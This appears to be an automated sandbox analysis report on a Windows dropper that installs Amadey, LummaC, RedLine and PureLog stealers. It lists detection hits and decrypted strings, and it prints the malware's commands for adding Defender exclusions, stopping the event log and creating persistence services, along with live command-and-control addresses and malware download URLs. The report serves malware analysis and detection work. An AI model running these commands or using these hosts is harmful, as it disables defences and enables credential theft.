Process Memory Space: powershell.exe PID: 5080	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x24a09f:$b1: ::WriteAllBytes( 0x376330:$b1: ::WriteAllBytes( 0x1063fa:$b2: ::FromBase64String( 0x24a051:$b2: ::FromBase64String( 0x3762e2:$b2: ::FromBase64String( 0x2e3b1f:$s1: -join 0x2f0bf4:$s1: -join 0x2f3fc6:$s1: -join 0x2f4678:$s1: -join 0x2f6169:$s1: -join 0x2f836f:$s1: -join 0x2f8b96:$s1: -join 0x2f9406:$s1: -join 0x2f9b41:$s1: -join 0x2f9b73:$s1: -join 0x2f9bbb:$s1: -join 0x2f9bda:$s1: -join 0x2fa42a:$s1: -join 0x2fa5a6:$s1: -join 0x2fa61e:$s1: -join 0x2fa6b1:$s1: -join
Process Memory Space: Ryu8yUx.exe PID: 2412	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
decrypted.memstr	JoeSecurity_Amadey_4	Yara detected Amadey	Joe Security
Click to see the 13 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
13.2.Ryu8yUx.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
61.2.ViGgA8C.exe.f20000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
61.2.ViGgA8C.exe.f20000.0.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
61.2.ViGgA8C.exe.f20000.0.unpack	infostealer_win_redline_strings	Finds Redline samples based on characteristic strings	Sekoia.io	0x11bcb:$gen01: ChromeGetRoamingName 0x11bff:$gen02: ChromeGetLocalName 0x11c28:$gen03: get_UserDomainName 0x13e67:$gen04: get_encrypted_key 0x133e3:$gen05: browserPaths 0x1372b:$gen06: GetBrowsers 0x13061:$gen07: get_InstalledInputLanguages 0x1084f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION 0x8938:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7} 0x9318:$spe6: windows-1251, CommandLine: 0x145c1:$spe9: wallet 0xf00c:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20 0xf107:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0 0xf464:$typ03: A937C899247696B6565665BE3BD09607F49A2042 0xf571:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2 0xf6f0:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63 0xf098:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60 0xf0c1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280 0xf25f:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301 0xf59a:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2 0xf639:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
61.2.ViGgA8C.exe.f20000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1068a:$u7: RunPE 0x13d41:$u8: DownloadAndEx 0x9330:$pat14: , CommandLine: 0x13279:$v2_1: ListOfProcesses 0x1088b:$v2_2: get_ScanVPN 0x1092e:$v2_2: get_ScanFTP 0x1161e:$v2_2: get_ScanDiscord 0x1260c:$v2_2: get_ScanSteam 0x12628:$v2_2: get_ScanTelegram 0x126ce:$v2_2: get_ScanScreen 0x13416:$v2_2: get_ScanChromeBrowsersPaths 0x1344e:$v2_2: get_ScanGeckoBrowsersPaths 0x13709:$v2_2: get_ScanBrowsers 0x137ca:$v2_2: get_ScannedWallets 0x137f0:$v2_2: get_ScanWallets 0x13810:$v2_3: GetArguments 0x11ed9:$v2_4: VerifyUpdate 0x167ee:$v2_4: VerifyUpdate 0x13bca:$v2_5: VerifyScanRequest 0x132c6:$v2_6: GetUpdates 0x167cf:$v2_6: GetUpdates
61.2.ViGgA8C.exe.f20000.0.unpack	Windows_Trojan_RedLineStealer_f54632eb	unknown	unknown	0x137ca:$a4: get_ScannedWallets 0x12628:$a5: get_ScanTelegram 0x1344e:$a6: get_ScanGeckoBrowsersPaths 0x1126a:$a7: <Processes>k__BackingField 0xf17c:$a8: <GetWindowsVersion>g__HKLM_GetString\|11_0 0x10b9e:$a9: <ScanFTP>k__BackingField
12.0.Ryu8yUx.exe.6a0000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
13.2.Ryu8yUx.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
12.2.Ryu8yUx.exe.3b79550.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
2.2.skotes.exe.260000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
12.2.Ryu8yUx.exe.3b79550.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
12.2.Ryu8yUx.exe.3b79550.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.Mc3FDUMnVz.exe.fa0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
3.2.skotes.exe.260000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Click to see the 9 entries

Other

Source	Rule	Description	Author	Strings
amsi32_5080.amsi.csv	JoeSecurity_PowershellDecodeAndExecute	Yara detected Powershell decode and execute	Joe Security
amsi32_5080.amsi.csv	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x13b35a:$b1: ::WriteAllBytes( 0xdc36e:$b2: ::FromBase64String( 0x13b30a:$b2: ::FromBase64String( 0xe7b3c:$s1: -join 0xe12e8:$s4: += 0xe13aa:$s4: += 0xe55d1:$s4: += 0xe76ee:$s4: += 0xe79d8:$s4: += 0xe7b1e:$s4: += 0x13df65:$s4: += 0x13e069:$s4: += 0x1414c5:$s4: += 0x141ba5:$s4: += 0x14205b:$s4: += 0x1420b0:$s4: += 0x142324:$s4: += 0x142353:$s4: += 0x14289b:$s4: += 0x1428ca:$s4: += 0x1429a9:$s4: +=

Sigma Signatures

Change of critical system settings

Sigma detected: Disable power options

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe, ParentProcessId: 5208, ParentProcessName: UN8QxIq.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 7244, ProcessName: powercfg.exe

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1074030001\bb6a39dc63.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 5084, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bb6a39dc63.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe, ParentProcessId: 5208, ParentProcessName: UN8QxIq.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 4444, ProcessName: powershell.exe

Sigma detected: Powerup Write Hijack DLL

Source: File created

Author: Subhash Popuri (@pbssubhash): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5080, TargetFilename: C:\Users\user\AppData\Local\Temp\ExtractedPayload_393813220\bs.bat

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1073578041\tYliuwV.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1073578041\tYliuwV.ps1", CommandLine|base64offset|contains: ^rbzh'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ParentImage: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ParentProcessId: 5084, ParentProcessName: skotes.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1073578041\tYliuwV.ps1", ProcessId: 5080, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1074030001\bb6a39dc63.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 5084, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bb6a39dc63.exe

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5080, TargetFilename: C:\Users\user\AppData\Local\Temp\ExtractedPayload_393813220\bs.bat

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden, ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 196, ParentProcessName: powershell.exe, ProcessCommandLine: C:\Windows\System32\svchost.exe -k WerSvcGroup, ProcessId: 4864, ProcessName: svchost.exe

Sigma detected: New Service Creation Using Sc.EXE

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "YUPXPWRM" binpath= "C:\ProgramData\dhjhauemqxxg\covxzxzipzly.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "YUPXPWRM" binpath= "C:\ProgramData\dhjhauemqxxg\covxzxzipzly.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe, ParentProcessId: 5208, ParentProcessName: UN8QxIq.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "YUPXPWRM" binpath= "C:\ProgramData\dhjhauemqxxg\covxzxzipzly.exe" start= "auto", ProcessId: 7908, ProcessName: sc.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1073578041\tYliuwV.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1073578041\tYliuwV.ps1", CommandLine|base64offset|contains: ^rbzh'2, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ParentImage: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ParentProcessId: 5084, ParentProcessName: skotes.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\user\AppData\Local\Temp\1073578041\tYliuwV.ps1", ProcessId: 5080, ProcessName: powershell.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5080, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyPayload.bat

HIPS / PFW / Operating System Protection Evasion

Sigma detected: Stop EventLog

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe, ParentProcessId: 5208, ParentProcessName: UN8QxIq.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 2664, ProcessName: sc.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Mc3FDUMnVz.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://modernakdventure.cyou/apiurj	Avira URL Cloud: Label: malware
Source: http://185.215.113.97/files/5801179114/UN8QxIq.exe	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php	Avira URL Cloud: Label: malware
Source: garulouscuto.com	Avira URL Cloud: Label: malware
Source: rebeldettern.com	Avira URL Cloud: Label: malware
Source: inputrreparnt.com	Avira URL Cloud: Label: malware
Source: voicesharped.com	Avira URL Cloud: Label: malware
Source: torpdidebar.com	Avira URL Cloud: Label: malware
Source: https://modernakdventure.cyou/_	Avira URL Cloud: Label: malware
Source: breedertremnd.com	Avira URL Cloud: Label: malware
Source: actiothreaz.com	Avira URL Cloud: Label: malware
Source: http://185.215.113.97/files/1506757897/tYliuwV.ps1	Avira URL Cloud: Label: malware
Source: https://modernakdventure.cyou/u	Avira URL Cloud: Label: malware
Source: https://modernakdventure.cyou/api	Avira URL Cloud: Label: malware
Source: http://185.215.113.97/files/5643377291/7fOMOTQ.exe	Avira URL Cloud: Label: malware
Source: importenptoc.com	Avira URL Cloud: Label: malware
Source: https://modernakdventure.cyou/	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\1074041001\23a60cad74.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\ViGgA8C[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1074040001\439c2c3c87.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 0000000C.00000002.78962753509.0000000003B79000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: LummaC {"C2 url": ["importenptoc.com", "voicesharped.com", "inputrreparnt.com", "torpdidebar.com", "rebeldettern.com", "actiothreaz.com", "garulouscuto.com", "breedertremnd.com"], "Build id": "LkkSUe--liveO"}
Source: 61.2.ViGgA8C.exe.f20000.0.unpack	Malware Configuration Extractor: RedLine {"C2 url": ["103.214.142.152:26264"], "Bot Id": "cheat"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\Ryu8yUx[1].exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\ViGgA8C[1].exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	ReversingLabs: Detection: 52%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Temp\tmp7BA6.tmp	ReversingLabs: Detection: 60%

Multi AV Scanner detection for submitted file

Source: Mc3FDUMnVz.exe	Virustotal: Detection: 63%			Perma Link
Source: Mc3FDUMnVz.exe	ReversingLabs: Detection: 57%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\Ryu8yUx[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1074041001\23a60cad74.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\46BKFKIN\UN8QxIq[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1073975001\WveK4j1.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1073867001\UN8QxIq.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1073650001\Ryu8yUx.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B0ZBZFKQ\ViGgA8C[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1073896001\ViGgA8C.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1074030001\bb6a39dc63.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\L2D128LW\WveK4j1[1].exe	Joe Sandbox ML: detected
Source: C:\ProgramData\dhjhauemqxxg\covxzxzipzly.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1074040001\439c2c3c87.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\7LE4YNMI\random[1].exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Mc3FDUMnVz.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 185.215.113.43
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: /Zu7JuNko/index.php
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: S-%lu-
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: abc3bc1985
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: skotes.exe
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Startup
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: cmd /C RMDIR /s/q
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: rundll32
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Programs
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: %USERPROFILE%
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: cred.dll\|clip.dll\|
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: cred.dll
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: clip.dll
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: http://
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: https://
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: /quiet
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: /Plugins/
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: &unit=
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: shell32.dll
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: kernel32.dll
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: GetNativeSystemInfo
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ProgramData\
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: AVAST Software
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Kaspersky Lab
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Panda Security
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Doctor Web
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 360TotalSecurity
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Bitdefender
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Norton
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Sophos
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Comodo
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: WinDefender
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: 0123456789
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ------
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ?scr=1
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ComputerName
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: -unicode-
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: VideoID
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: DefaultSettings.XResolution
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: DefaultSettings.YResolution
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: ProductName
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: CurrentBuild
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: rundll32.exe
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: "taskkill /f /im "
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: " && timeout 1 && del
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: && Exit"
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: " && ren
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: Powershell.exe
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: -executionpolicy remotesigned -File "
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: shutdown -s -t 0
Source: 00000002.00000002.78392039716.0000000000261000.00000040.00000001.01000000.00000007.sdmp	String decryptor: random
Source: 0000000C.00000002.78962753509.0000000003B79000.00000004.00000800.00020000.00000000.sdmp	String decryptor: importenptoc.com
Source: 0000000C.00000002.78962753509.0000000003B79000.00000004.00000800.00020000.00000000.sdmp	String decryptor: voicesharped.com
Source: 0000000C.00000002.78962753509.0000000003B79000.00000004.00000800.00020000.00000000.sdmp	String decryptor: inputrreparnt.com
Source: 0000000C.00000002.78962753509.0000000003B79000.00000004.00000800.00020000.00000000.sdmp	String decryptor: torpdidebar.com
